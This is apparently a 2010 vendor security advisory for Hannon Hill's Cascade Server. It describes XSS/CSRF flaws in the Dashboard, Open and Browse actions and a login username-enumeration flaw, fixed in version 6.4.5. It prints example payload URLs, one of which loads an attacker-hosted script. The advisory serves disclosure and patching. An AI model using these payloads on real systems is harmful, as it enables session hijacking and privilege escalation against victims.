Security Update 05-06-2010
There are two different types of vulnerabilities mentioned in this update: XSS/CSRF and brute-force attack vulnerabilities.
Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF) Vulnerabilities in Dashboard, Open, and Browse Actions
Severity: Moderate
Hannon Hill rates the severity of these vulnerabilities as
Moderate. The vulnerabilities allow an attacker to make victims
execute arbitrary JavaScript, gain access to Cascade, or elevate
his/her privileges; but they require the attacker to manipulate
victims using social engineering tactics. If the attacker already
had Cascade credentials, he/she could embed a malicious link in
frequently visited content to more easily manipulate victims into
navigating to it.
Risk Assessment
The underlying vulnerability is when an input parameter's value
is returned verbatim in the browser in the forwarded page from the
following actions: Dashboard,
Open, and Browse
XSS Vulnerability
An attacker without access to Cascade could manipulate victims
using social engineering tactics to execute arbitrary JavaScript
when navigating to the the Cascade dashboard action.
An example link would be:
http://domain:port/home.act?tab=m<script>alert(54682)</script>
An attacker with access to Cascade could embed a link to the
Cascade dashboard action containing arbitrary JavaScript in a
prominent place within Cascade page content to more easily
manipulate victims into navigating to the link.
CSRF Vulnerability
The CSRF vulnerability is an extension of the XSS scripting
vulnerability.
Examples include:
http://<cascade_url>/home.act?tab="'><IMG%20SRC="/WF_XSRF.html">
and:
http://<cascade_url>/home.act?tab="'><script>document.domain=domain.dom</script><script%20src="http://subdomain.domain.com/attacker/x.js"/>
NOTE: Both require the attacker to have access to the Cascade server or a server at the same top-level domain where Cascade is running. For example, if Cascade is hosted at cascade.hannonhill.com, the attacker would also need access to be able to access the web space of a sub-domain like intranet.hannonhill.com. In the second example, by resetting the document domain for the page to the top-level domain, this allows the attacker to bypass the Same Origin browser security policy and security restrictions that would normally prevent a script from loading from a different server.
Vulnerability
The XSS and CSRF vulnerabilities exists for all Cascade Server
versions prior to Cascade 6.4.5.
Fix
The fix is for Cascade to properly escape and/or hide user input when displaying the error message in the pages forwarded to from the above actions.
Theses have been fixed in Cascade 6.4.5 and later.
Brute force attack vulnerability in Login action
Severity: Moderate
Hannon Hill rates the severity of this vulnerability as moderate
as opposed to high as it does not occur for all types of users or
for all authentication methods.
Risk Assessment
The vulnerability exists due to the fact that users authenticated using LDAP and users who attempt to authenticate using Web Services are presented with different error messages if their username or password is incorrect.
This opens the system up to a brute-force attack as the attacker
would be able to confirm the validity of the guessed username in
some cases.
Vulnerability
This vulnerability exists in all versions of Cascade prior to
6.4.5
Fix
The fix is to unify the error messages so that an incorrect username or password will generate the same error regardless of protocol or authentication method.